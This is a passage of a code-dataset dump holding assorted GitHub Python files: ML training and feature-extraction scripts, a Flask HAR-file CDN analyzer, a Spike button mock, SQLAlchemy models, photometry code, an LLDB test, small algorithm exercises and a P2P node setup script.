shuffle=False, num_workers=workers)\n\n model_nums = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]\n\n for model_num in model_nums:\n resume = '/data/users/yuefan/fanyue/dconv/checkpoints/' + dataset + '/' + model_type + '_' + str(model_num) + '_60/model_best.pth.tar'\n print(resume)\n\n if arch.startswith('resnet50'):\n model = models.__dict__[arch](\n num_classes=num_classes,\n include_top=False,\n dropout_rate=0,\n layer=layer\n )\n elif arch.startswith('d1_resnet50'):\n model = models.__dict__[arch](\n num_classes=num_classes,\n include_top=False,\n dropout_rate=0,\n layer=layer,\n is_shuff=False # TODO: check\n )\n else:\n raise Exception('The arch is not supported!')\n model = torch.nn.DataParallel(model).cuda()\n cudnn.benchmark = True\n assert os.path.isfile(resume), 'Error: no checkpoint directory found!'\n checkpoint = torch.load(resume)\n model.load_state_dict(checkpoint['state_dict'])\n\n saved_path = '/data/users/yuefan/fanyue/dconv/maruis_conjecture/'+dataset+'/'+model_type+'_'+str(model_num)+'/'\n if not os.path.isdir(saved_path):\n mkdir_p(saved_path)\n\n test_data_represent_list = test(testloader, model, use_cuda, 10000) # 335MB\n test_data_represent_list = np.array(test_data_represent_list)\n train_data_represent_list = test(trainloader, model, use_cuda, 50000) # 1.6GB\n train_data_represent_list = np.array(train_data_represent_list)\n\n index = faiss.IndexFlatL2(512) # build the index IndexFlatIP\n print(index.is_trained)\n index.add(train_data_represent_list) # add vectors to the index\n print(index.ntotal)\n\n k = 5 # we want to see 5 nearest neighbors\n D, I = index.search(train_data_represent_list, k) # actual search\n np.save(saved_path + 'train_img_manidist_I.npy', I)\n np.save(saved_path + 'train_img_manidist_D.npy', D) # TODO: note D is the squared euclidean distance\n \n # # np.save(save_path+'test.npy', test_data_represent_list)\n #\n \n # # np.save(save_path + 'train.npy', train_data_represent_list)\n #\n # # compute the manifold distance for each of the test image\n # del model\n # tree = KDTree(train_data_represent_list)\n # distances, _ = tree.query(test_data_represent_list, k=5, p=2)\n # distances = np.array(distances).mean(axis=1)\n # np.save(save_path + 'test_img_manidist_list.npy', distances)\n\n\ndef test(testloader, model, use_cuda, loader_len):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n data_represent_list = []\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n end = time.time()\n bar = Bar('Processing', max=len(testloader))\n for batch_idx, (inputs, targets) in enumerate(testloader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = torch.autograd.Variable(inputs), torch.autograd.Variable(targets)\n\n # compute output\n outputs = model(inputs)\n outputs = torch.nn.functional.avg_pool2d(outputs, kernel_size=(4, 4), stride=(1, 1))\n outputs = outputs.view(outputs.size(0), -1)\n\n data_represent_list.extend(outputs.detach().cpu().numpy())\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # plot progress\n bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:}'.format(\n batch=batch_idx + 1,\n size=len(testloader),\n data=data_time.avg,\n bt=batch_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td\n )\n bar.next()\n bar.finish()\n return data_represent_list\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"YUE-FAN/shuffle","sub_path":"OtherBranch/cifar_marius.py","file_name":"cifar_marius.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"24467267971","text":"from flask import Flask\nfrom flask import request\nimport json\nimport pprint\nimport sys\nfrom urllib.parse import urlparse\nfrom flask import render_template\nfrom google.cloud import storage\nimport time\nimport argparse\nimport pprint\npp = pprint.PrettyPrinter(indent=4)\n\nfrom haralyzer import HarParser, HarPage\n\ndef linkify(url):\n \"\"\"takes a URL and returns the HTML for a link to the URL\"\"\"\n # url = \"url to make into an HTML link\"\n hyperlink_format = '{text}'\n return hyperlink_format.format(link=url, text=url)\n \ndef upload_blob(bucket_name, stuff, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n # bucket_name = \"your-bucket-name\"\n # source_file_name = \"local/path/to/file\"\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_string(stuff)\n \ndef parse_file(f):\n har_parser = HarParser(json.loads(f))\n\n rows = [['X-CACHE-HEADER', 'BYTES', 'URL']]\n\n hosts = {}\n size = {}\n total_bytes = 0 #total bytes for all content across the entire thing \n\n for page in har_parser.pages:\n assert isinstance(page, HarPage)\n for entry in page.entries:\n cdn = []\n headers = entry['response']['headers']\n #print(entry['response'], file=sys.stderr)\n cdn_str = None\n total_bytes += entry['response']['content']['size']\n #pp.pprint(entry['request'])\n url = urlparse(entry['request']['url'])\n for h in headers: \n if( h['name'] == 'x-cache'):\n hosts[url.netloc] = 1\n #print(url, file=sys.stderr)\n cdn_str = h['value']\n cdn.append(cdn_str)\n \n if( cdn_str in size ):\n size[cdn_str] = size[cdn_str] + entry['response']['content']['size']\n else:\n size[cdn_str] = entry['response']['content']['size']\n print(\"\\t\".join([str(cdn), str(entry['response']['content']['size']), entry['request']['url'], url.netloc]))\n rows.append([cdn, entry['response']['content']['size'], linkify(entry['request']['url'])])\n \n bysize = [['CACHE TAG', '% OF BYTES']]\n for sk in size.keys():\n bysize.append( [sk, \"{:.1%}\".format(size[sk] / total_bytes)] )\n \n bysize_t = list(map(list, zip(*bysize))) \n hosts_t = list(map(list, zip(*[hosts.keys()]))) \n return {'total_bytes':total_bytes, 'hosts_t':hosts_t, 'bysize':bysize, 'rows':rows} \n #return json.dumps([hosts, size, rows])\n \n\n# If `entrypoint` is not defined in app.yaml, App Engine will look for an app\n# called `app` in `main.py`.\napp = Flask(__name__)\n\n@app.route('/')\ndef write_form():\n \"\"\"Render landing page with instructions and form to upload an HAR file\"\"\"\n return render_template('form.html', title='Home')\n \n@app.route('/upload_file', methods=['POST'])\ndef upload_file():\n \"\"\"Process the uploaded file. Save a copy to a cloud bucket. 
Then parse out the headers and grab the x-cache headers that show which CDN it loaded from\"\"\"\n f = request.files['yourFileName'].read()\n try:\n ts = time.time()\n upload_blob('cdninfolyzer.appspot.com', f, \"data/\" + str(ts))\n except Exception as e:\n print (e)\n r = parse_file(f)\n return render_template('results.html', titles=['', 'Total bytes', 'Hosts', 'By Service', 'Results' ], tables=[[['Total bytes:', r['total_bytes']]],r['hosts_t'], r['bysize'], r['rows']])\n \n@app.route('/list_files')\ndef do_list_files():\n \"\"\"Lists all buckets.\"\"\"\n\n\n \"\"\"Lists all the blobs in the bucket.\"\"\"\n # bucket_name = \"your-bucket-name\"\n\n storage_client = storage.Client()\n\n # Note: Client.list_blobs requires at least package version 1.17.0.\n blobs = storage_client.list_blobs(\"cdninfolyzer.appspot.com\" ,prefix=\"data/\")\n\n blist = []\n\n for blob in blobs:\n blist.append(blob.name)\n\n return str(blist)\n \n@app.route('/results')\ndef do_results():\n \"\"\"display static results page\"\"\"\n return render_template('all_results.html', title='Home')\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='process session files')\n parser.add_argument('--bulk', nargs='+', type=open, help='upload all files matching to database')\n args = parser.parse_args()\n\n \n if args.bulk:\n print (\"bulk\")\n \n for a in args.bulk:\n \n #print ( parse_file (a.read())['bysize'] , file=sys.io.stderr)\n try: \n print ( parse_file (a.read())['bysize'] , file=sys.io.stderr)\n except Exception as e:\n print (e)\n \n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. This\n # can be configured by adding an `entrypoint` to app.yaml.\n else:\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python38_app]\n","repo_name":"adervish/cdn","sub_path":"cdn_gae/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23500019290","text":"from time import sleep\nfrom threading import Lock\n\n# Local includes\nfrom spike.scenario.scenario import Scenario\n\nclass Button() :\n \"\"\" Hub button mocking class.\n\n Class is accessed simultaneously by the user side thread and the\n ground truth update thread. 
It is therefore protected by a mutex\n \"\"\"\n\n # Constants\n s_sides = ['left', 'right']\n\n # Static variables\n s_shared_scenario = Scenario()\n\n####################################### SPIKE API METHODS ########################################\n\n def __init__(self, side) :\n \"\"\"\n Contructor\n\n :param side: button side (left or right)\n :type side: string\n \"\"\"\n\n self.__mutex = Lock()\n\n self.__is_pressed = False\n self.__was_pressed = False\n\n self.s_shared_scenario.register(self, side)\n\n def wait_until_pressed(self) :\n \"\"\" Wait until the button is pressed\"\"\"\n while not self.is_pressed() : sleep(0.01)\n\n def wait_until_released(self) :\n \"\"\" Wait until the button is released\"\"\"\n while self.is_pressed() : sleep(0.01)\n\n def was_pressed(self) :\n \"\"\"\n Tests to see whether the button has been pressed since the last time this method called.\n Once this method returns \"true,\" the button must be released and pressed again before it\n will return \"true\" again.\n\n :return: True if the button was pressed, false otherwise\n :rtype: boolean\n \"\"\"\n\n result = None\n with self.__mutex :\n result = self.__was_pressed\n self.__was_pressed = False\n\n return result\n\n def is_pressed(self) :\n \"\"\"\n Tests whether the button is pressed.\n\n :return: True if the button is pressed, otherwise false\n :rtype: boolean\n \"\"\"\n\n result = None\n with self.__mutex :\n result = self.__is_pressed\n return result\n\n######################################## SCENARIO METHODS ########################################\n\n def c_reset(self) :\n \"\"\"\n Reset function\n\n .. warning:: This function is not part of the spike API. It is provided to update the\n component from scenario data and shall not be used by the end-user.\n\n \"\"\"\n with self.__mutex :\n self.__is_pressed = False\n self.__was_pressed = False\n\n def c_read(self, is_pressed) :\n \"\"\"\n Button status setting function\n\n .. warning:: This function is not part of the spike API. It is provided to update the\n component from scenario data and shall not be used by the end-user.\n\n :param is_pressed: True if button is pressed, false otherwise\n :type is_pressed: boolean\n \"\"\"\n with self.__mutex :\n self.__is_pressed = is_pressed\n if not self.__was_pressed :\n self.__was_pressed = self.__is_pressed\n","repo_name":"nadegelemperiere/spike-mock","sub_path":"spike/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43008883764","text":"from sklearn.metrics import r2_score, mean_absolute_error\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport sys\n\n\nclass NeuralNetwork:\n\n# Neural Network Class using TensorFlow\n# Multiple layers can be constructed by passing\n# n_nodes: number of layers in each layer as a list\n# actf: activation fuction in each layer\n# dropout: True or False in a list that designates whether dropout exists in each layer.\n# training_epochs: the number of training iteration steps\n# learning_rate: the learning rate of gradient descent algorithm\n# random_seed: the random seed number for reproducing the results. 
\n\n def __init__(self, sess, n_samples, n_features, n_nodes=[10,5,2], actf=[tf.nn.relu, tf.nn.relu, tf.nn.sigmoid], \\\n dropout = [True, True, False],\\\n training_epochs=1000, learning_rate=0.001,\\\n batch_size=128, random_seed = 2):\n self.sess = sess\n self.n_samples = n_samples\n tf.set_random_seed(random_seed)\n self.X = tf.placeholder(tf.float32)\n self.y = tf.placeholder(tf.float32)\n self.batch_size = batch_size\n self.n_nodes = [n_features] + n_nodes\n self.nlayers = len(self.n_nodes) #number of layers including input and hidden layers\n self.dropout = dropout\n self.training_epochs = training_epochs\n self.hidden_layer = []\n self.actf = actf\n\n # set the weights/biases in the hidden layer\n if self.nlayers >= 2:\n for i in range(self.nlayers-1):\n self.hidden_layer.append({'weights':tf.Variable(tf.truncated_normal([self.n_nodes[i], self.n_nodes[i+1]], stddev=0.05)),\n 'biases':tf.Variable(tf.truncated_normal([self.n_nodes[i+1]], stddev=0.05))})\n\n # set the weights/biases in the output layer\n self.output_layer = {'weights': tf.Variable(tf.truncated_normal([self.n_nodes[-1], 2], stddev=0.05)),\n 'biases': tf.Variable(tf.truncated_normal([2], stddev=0.05))}\n\n # keep probability of drop-out.\n self.keep_prob = tf.placeholder(tf.float32)\n\n # calculate prediction given features X\n self.y_pred = self.MLP_model(self.X)\n\n # calculate cost\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=self.y_pred))\n\n # set the optimizer\n self.optimizer = tf.train.AdamOptimizer(learning_rate).minimize(self.cost)\n\n def MLP_model(self, X):\n #Create multi level perceptron model (feed forward neural network)\n l = X\n for i in range(self.nlayers-1):\n l = tf.add(tf.matmul(l, self.hidden_layer[i]['weights']), self.hidden_layer[i]['biases'])\n l = self.actf[i](l)\n if self.dropout[i]:\n l = tf.nn.dropout(l, self.keep_prob)\n\n output = tf.matmul(l, self.output_layer['weights']) + self.output_layer['biases']\n return output \n\n def train_and_test(self, X_train, y_train, X_test, y_test, keep_prob=1.0):\n #input\n # X_train: training features\n # y_train: training target\n # X_test: testing features\n # y_test: testing target\n # keep_prob: the keep probability for drop-out\n \n tf.global_variables_initializer().run(session=self.sess)\n cost_list = []\n test_cost_list = []\n\n # for each epoch\n for epoch in range(self.training_epochs):\n\n # calculate the number of data in each batch\n n_batch = int(self.n_samples / self.batch_size)\n\n # for each batch\n for i in range(n_batch):\n\n # calculate the offset and calculate features and target\n offset = (i * self.batch_size) % self.n_samples\n X_batch = X_train[offset:offset + self.batch_size, :]\n y_batch = y_train[offset:offset + self.batch_size]\n\n # run the optimizer\n self.sess.run(self.optimizer, feed_dict={self.X: X_batch, self.y: y_batch, self.keep_prob:keep_prob})\n\n # the last remaining data for the last batch\n if n_batch < self.n_samples:\n\n # calculate the offset and calculate features and target\n offset = n_batch * self.batch_size\n X_batch = X_train[offset:, :]\n y_batch = y_train[offset:]\n\n # run the optimizer\n self.sess.run(self.optimizer, feed_dict={self.X: X_batch, self.y: y_batch, self.keep_prob:keep_prob})\n\n # calculate the cost for training data set\n cost = self.sess.run(self.cost, feed_dict={self.X: X_train, self.y: y_train, self.keep_prob:keep_prob})\n\n # calculate the cost for testing data set\n test_cost = self.sess.run(self.cost, feed_dict={self.X: X_test, self.y: 
y_test, self.keep_prob:keep_prob})\n\n cost_list.append(cost)\n test_cost_list.append(test_cost)\n\n # Print informations at every 100 steps.\n if epoch % 100 == 0:\n sys.stdout.write(\"\\repoch = %d, cost = %f, test_cost = %f\" % (epoch, cost, test_cost))\n\n # output: prediction from testing features, training cost in a list, testing cost in a list\n return self.test(X_test), cost_list, test_cost_list\n\n #predict from testing data\n def test(self, X_test):\n if type(X_test) == pd.core.frame.DataFrame:\n X_test = X_test.values\n # For testing time, we need to keep drop-out to 0. In other words, keep_prob is 1.0\n return self.sess.run(self.MLP_model(X_test.astype(np.float32)), feed_dict={self.keep_prob:1.0})\n\n #calculate accuracy\n def accuracy(self, X_test, y_test, type=\"mean_absolute_error\"):\n if type == \"r2_score\":\n acc = r2_score(y_test, self.query(X_test))\n elif type == \"mean_absolute_error\":\n acc = mean_absolute_error(y_test, self.query(X_test))\n return acc\n\n","repo_name":"sunggeunkim/Machine-Learning-Trading","sub_path":"NeuralNetwork_Cross_Entropy_mini_batch.py","file_name":"NeuralNetwork_Cross_Entropy_mini_batch.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"4176068044","text":"from sqlalchemy import (\n create_engine,\n Column,\n Integer,\n String,\n Date,\n Boolean,\n ForeignKey,\n MetaData\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import (\n sessionmaker,\n relationship\n)\n\n\ndef get_db_connection_url():\n from os import environ as env\n\n if env.get('ENGINE'):\n db_engine = env.get('ENGINE', 'postgres')\n db_name = env.get('POSTGRES_DB')\n host = env.get('POSTGRES_HOST', 'localhost')\n port = env.get('POSTGRES_PORT', '5432')\n user = env.get('POSTGRES_USER')\n password = env.get('POSTGRES_PASSWORD')\n\n return '{}://{}:{}@{}:{}/{}'.format(\n db_engine,\n user,\n password,\n host,\n port,\n db_name\n )\n\n else:\n return 'sqlite:///:memory:'\n\n\nBase = declarative_base()\n\nmetadata = MetaData()\n\n\nclass Profile(Base):\n __tablename__ = 'profile'\n\n id = Column('id', Integer, primary_key=True, autoincrement=True)\n firstname = Column('firstname', String(100))\n surname = Column('surname', String(100))\n user_id = Column('user_id', Integer, index=True, unique=True)\n birthdate = Column('birthdate', Date)\n gender = Column('gender', String(10))\n avatar = Column('avatar', String(200))\n\n def __repr__(self):\n return 'id=%s firstname=%s surname=%s' % (self.id, self.firstname, self.surname)\n\n\nclass Config(Base):\n __tablename__ = 'config'\n\n id = Column('id', Integer, primary_key=True)\n user_id = Column('user_id', Integer, index=True, unique=True)\n language = Column('language', String(5))\n dark_mode = Column('dark_mode', Boolean)\n\n","repo_name":"iliadmitriev/profile","sub_path":"profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74378705809","text":"from models.model import Model\nfrom sklearn.model_selection import train_test_split\n\nclass Separator(Model):\n\n def __init__(self, name=\"separator\", minimum=10, shuffle=True):\n super().__init__(name)\n self.ratio = {\n \"train\": 0.6,\n \"dev\": 0.2,\n \"test\": 0.2\n }\n self.minimum = minimum\n self.shuffle = shuffle\n self.X, self.y = [], []\n self.results = dict()\n\n def set_data(self, X, y):\n self.X, 
self.y = X, y\n\n def set_ratio(self, ratio):\n self.ratio = ratio\n\n def run(self):\n X_train, X_test, y_train, y_test = train_test_split(self.X, self.y, test_size=self.ratio[\"test\"], shuffle=self.shuffle, random_state=42)\n if \"dev\" in self.ratio: \n X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=self.ratio[\"dev\"], shuffle=self.shuffle, random_state=42)\n self.results = {\n \"train\" : [X_train, y_train],\n \"dev\" : [X_val, y_val],\n \"test\" : [X_test, y_test]\n }\n else:\n self.results = {\n \"train\" : [X_train, y_train],\n \"test\" : [X_test, y_test]\n }\n if len(self.y) <= self.minimum:\n for key in self.results:\n self.results[key] = [self.X[:], self.y[:]]\n return self.results\n","repo_name":"lvhanh270597/predict-accent-vietnam","sub_path":"models/separate_data/separator.py","file_name":"separator.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42602416760","text":"#coding=utf-8\n\"\"\"\n@athor:weifeng.guo \n@data:2018/11/12 16:27\n@filename:Bigger_Price\n\"\"\"\n\ndef bigger_price(num,list):\n list_1 = sorted(list, key=lambda list : list['price'], reverse=True)\n return (list_1[:num])\n\n\n\n\nbigger_price(2, [\n {\"name\": \"bread\", \"price\": 100},\n {\"name\": \"wine\", \"price\": 138},\n {\"name\": \"meat\", \"price\": 15},\n {\"name\": \"water\", \"price\": 1}\n])","repo_name":"guoweifeng216/pythonlearn","sub_path":"checkio/Bigger_Price.py","file_name":"Bigger_Price.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11622870289","text":"# coding=utf8\nimport lldb\nfrom lldbsuite.test.lldbtest import *\nimport lldbsuite.test.lldbutil as lldbutil\nfrom lldbsuite.test.decorators import *\n\n\nclass TestUnicodeSymbols(TestBase):\n @skipIf(compiler=\"clang\", compiler_version=[\"<\", \"7.0\"])\n def test_union_members(self):\n self.build()\n spec = lldb.SBModuleSpec()\n spec.SetFileSpec(lldb.SBFileSpec(self.getBuildArtifact(\"a.out\")))\n module = lldb.SBModule(spec)\n self.assertTrue(module.IsValid())\n mytype = module.FindFirstType(\"foobár\")\n self.assertTrue(mytype.IsValid())\n self.assertTrue(mytype.IsPointerType())\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/lang/c/unicode/TestUnicodeSymbols.py","file_name":"TestUnicodeSymbols.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"69913253970","text":"from sys import stdin\n\nt = int(input())\n\nfor _ in range(t):\n V, E, k = map(int, stdin.readline().split())\n edges = {v:[] for v in range(V)}\n for _ in range(E):\n s, e, w =map(int, stdin.readline().split())\n edges[e].append((s,w))\n\n dist = [[float('inf') for _ in range(k+1)] for _ in range(V)]\n for i in range(k+1):\n dist[0][i] = 0\n\n for i in range(1, k+1):\n for v in range(V):\n # curedges = [e for e in edges if e[1] == v]\n minimum = float('inf')\n for s, w in edges[v]:\n curdist = dist[s][i-1] + w\n if minimum > curdist:\n minimum = curdist\n if minimum == float('inf'):\n dist[v][i] = dist[v][i-1]\n else:\n dist[v][i] = minimum\n\n if dist[V-1][k] == float('inf'):\n print(\"NO\")\n else:\n print(dist[V-1][k]) \n 
","repo_name":"jangyoojin/BOJ","sub_path":"PA4_shortest_kPath.py","file_name":"PA4_shortest_kPath.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5764806114","text":"\n\"\"\" \nFind the Missing Element\n\nProblem\nConsider an array of non-negative integers. A second array is formed by shuffling the elements of the first array and deleting a random element. Given these two arrays, find which element is missing in the second array.\n\nHere is an example input, the first array is shuffled and the number 5 is removed to construct the second array.\n\nInput:\n\nfinder([1,2,3,4,5,6,7],[3,7,2,1,4,6])\n\nOutput:\n\n5 is the missing number\n\nSolution\nThe naive solution is go through every element in the second array and check whether it appears in the first array. Note that there may be duplicate elements in the arrays so we should pay special attention to it. The complexity of this approach is O(N^2), since we would need two for loops.\n\nA more efficient solution is to sort the first array, so while checking whether an element in the first array appears in the second, we can do binary search (we'll learn about binary search in more detail in a future section). But we should still be careful about duplicate elements. The complexity is O(NlogN).\n\n most interviews, you would be expected to come up with a linear time solution. We can use a hashtable and store the number of times each element appears in the second array. Then for each element in the first array we decrement its counter. Once hit an element with zero count that’s the missing element. Here is this solution: the first iterator is the missing element. This solution is also O(NlogN). Here is the solution for this approach: \"\"\"\n\n\n\"\"\" \n\n1. intiate the defaut dict\n 2. loop thru second array and create a hash table\n 3. 
loop thru first array and check if each element freqeuncy is 0, if so return \n else decrement the num\n\n \n \"\"\"\nimport collections\n\ndef finder(arr1, arr2):\n d = collections.defaultdict(int)\n\n for num in arr2:\n d[num] +=1\n \n for num in arr1:\n if d[num] == 0:\n return num\n else :\n d[num] -=1\n\n \n\nprint(finder([5,5,7,7],[5,7,7])) # 5\nprint(finder([1,2,3,4,5,6,7],[3,7,2,1,4,6])) # 5 \nprint(finder([9,8,7,6,5,4,3,2,1],[9,8,7,5,4,3,2,1])) # 6\nprint(finder([1, 4, 5, 7, 9], [4, 5, 7, 9])) #1\n","repo_name":"Vatsal272120/pythonProblems-","sub_path":"Arrays/FindingMissingElement.py","file_name":"FindingMissingElement.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"35279677172","text":"# Найдите сумму цифр трехзначного числа.\n\n# *Пример:*\n\n# 123 -> 6 (1 + 2 + 3)\n# 100 -> 1 (1 + 0 + 0) |\ns = input(\"Введите трехзначное число что бы найти сумму его чисел: \")\nnum = 0\nif len(s) == 3:\n for i in s:\n num += int(i)\n print(F\"Суммой трех чилес является: {num}\")\nelse:\n print(\"Это не трехзначное число\")","repo_name":"kopkan123/Domaha.py","sub_path":"dom1.py","file_name":"dom1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38194461567","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 21 23:45:33 2021\n\n@author: Steven Hill\n\"\"\"\n\ndef ComputeNetRateJupiter(scidata,header,TargetIDs,SessionID,positions,radii):\n from photutils import CircularAperture\n from photutils import aperture_photometry\n from photutils import CircularAnnulus\n import Meta_and_Control_Data_Operations as Meta\n from astropy.table import Table, hstack\n import pylab as pl\n\n #Create aperture objects \n apertures = CircularAperture(positions, r=radii[0])\n annulus_apertures = CircularAnnulus(positions, r_in=radii[1], r_out=radii[2])\n\n #Compute raw fluxes\n rawflux_table = aperture_photometry(scidata, apertures)\n bkgflux_table = aperture_photometry(scidata, annulus_apertures)\n \n phot_table = hstack([rawflux_table, bkgflux_table], table_names=['raw', 'bkg'])\n bkg_mean = phot_table['aperture_sum_bkg'] / annulus_apertures.area()\n #print \"bkg_mean=\",bkg_mean\n bkg_sum = bkg_mean * apertures.area()\n #print \"bkg_sum=\",bkg_sum\n final_sum = phot_table['aperture_sum_raw'] - bkg_sum\n #print \"final_sum=\",final_sum\n rate=final_sum/header['EXPTIME']\n phot_table['net_count_rate'] = rate\n #print \"Raw=\",rawflux_table\n #print 'Bkg=',bkgflux_table\n phot_table['Target']=TargetIDs\n phot_table['Filter']=header['Filter']\n phot_table['Date-Obs']=header['MIDPOINT']\n phot_table['SessionID']=SessionID\n phot_table.remove_column('id_bkg')\n phot_table.remove_column('xcenter_bkg')\n phot_table.remove_column('ycenter_bkg')\n #print phot_table\n Filter=Meta.FilterParameters(header['FILTER'])\n WVCenter=Filter.CenterWV###Testing Area\n \n \"\"\"\n #Code to display diagnostic plots (not yet finished):\n \n pl.figure(figsize=(6,4), dpi=150, facecolor=\"white\")\n pl.imshow(scidata)\n ap_patches = apertures.plot(color='white', lw=0.5,\n label='Photometry aperture')\n ann_patches = annulus_apertures.plot(color='red', lw=0.5,\n label='Background annulus')\n #labels = (ap_patches[0], ann_patches[0])\n #pl.legend(font=10)\n \"\"\"\n return rate,WVCenter,phot_table\n\ndef uniform_lat_grid(Latitude,Signal,Fine=False):\n \"\"\"\n Takes an existing latitude profile on a non-standard or even 
irregular\n grid and performs linear interpolation to place the data\n on one of two uniform grids:\n 1) -90 to 90 with 1 deg bins\n 2) -90 to 90 with 2 deg bins\n \"\"\"\n import numpy as np\n from scipy import interpolate\n\n if Fine: #Set grid interval\n dlat=1.0\n else:\n dlat=2.0\n\n LatGrid=np.arange(-90.,90.1,dlat,dtype=float)\n #print Wavelength.size,Signal.size \n Interp=interpolate.interp1d(Latitude,Signal,kind='linear', \n copy=True,bounds_error=False, \n fill_value=np.NaN,axis=0) \n SignalonGrid=Interp(LatGrid)\n\n return LatGrid,SignalonGrid","repo_name":"smhill001/Jupiter_NH3_Analysis","sub_path":"ComputeNetRateJupiter.py","file_name":"ComputeNetRateJupiter.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28849097743","text":"class Solution:\n def minCostToMoveChips(self, position: List[int]) -> int:\n '''\n Idea: Move all even positioned chips to 0, i.e., count them and \n all odd positioned chips to 1, i.e., count them; take min of two counts\n T: O(n) and S: O(1)\n '''\n zeroCost, oneCost = 0, 0\n for i in range(len(position)):\n if position[i] % 2:\n oneCost += 1\n else:\n zeroCost += 1\n \n return min(zeroCost, oneCost)\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2020-11/05-Minimum-Cost-to-Move-Chips-to-the-Same-Position.py","file_name":"05-Minimum-Cost-to-Move-Chips-to-the-Same-Position.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"12826349315","text":"from pathlib import Path\r\nimport random\r\nimport time\r\nfrom subprocess import call\r\n\r\nnodeCount = 10\r\nrunningNodes = 10\r\nsleepTime = 15\r\nstoragePath = \"/home/thameera/Distributed/python\"\r\nnodePropertiesPath = \"\"\r\nport = 1235\r\ncontent = [ \"Adventures of Tintin\", \"Jack and Jill\", \"Glee\", \"The Vampire Diarie\", \"King Arthur\", \"Windows XP\", \"Harry Potter\", \"Kung Fu Panda\", \"Lady Gaga\", \"Twilight\", \"Windows 8\", \"Mission Impossible\", \"Turn Up The Music\", \"Super Mario\", \"American Pickers\", \"Microsoft Office 2010\", \"Happy Feet\", \"Modern Family\", \"American Idol\", \"Hacking for Dummies\"]\r\n\r\ndef createNodes(nodeCount, storagePath, nodePropertiesPath, port, content):\r\n for i in range(nodeCount):\r\n i+=1\r\n Path(storagePath + \"/node%s/local_storage\"%i).mkdir(parents=True, exist_ok=True)\r\n Path(storagePath + \"/node%s/cache_storage\"%i).mkdir(parents=True, exist_ok=True)\r\n with open(nodePropertiesPath + \"node%s.properties\" % i, \"w\") as f:\r\n f.write(\"cache_dir=%s/node%s/cache_storage\\nlocal_dir=%s/node%s/local_storage\\ncache_size=10000000\\nport=%s\\nboostrap_server_ip=127.0.0.1\\nboostrap_server_port=55555\" % (storagePath, i, storagePath, i, i+port))\r\n with open(storagePath + \"/node%s/local_storage/filelist.txt\"%i, \"w\") as f:\r\n randomContent = random.sample(content, random.randrange(len(content)))\r\n for k in randomContent:\r\n f.write(\"%s\\n\"%k)\r\n open(storagePath + \"/node%s/cache_storage/filelist.txt\"%i, \"w\")\r\n\r\ndef runNodes(runningNodes, sleepTime):\r\n for i in range(runningNodes):\r\n i+=1\r\n call(['gnome-terminal', '--tab', '-e', 'java -jar p2pFileTransfer-0.0.1-SNAPSHOT.jar node%s.properties'%i])\r\n time.sleep(sleepTime)\r\n\r\ncreateNodes(nodeCount, storagePath, nodePropertiesPath, port, content)\r\nrunNodes(runningNodes, 
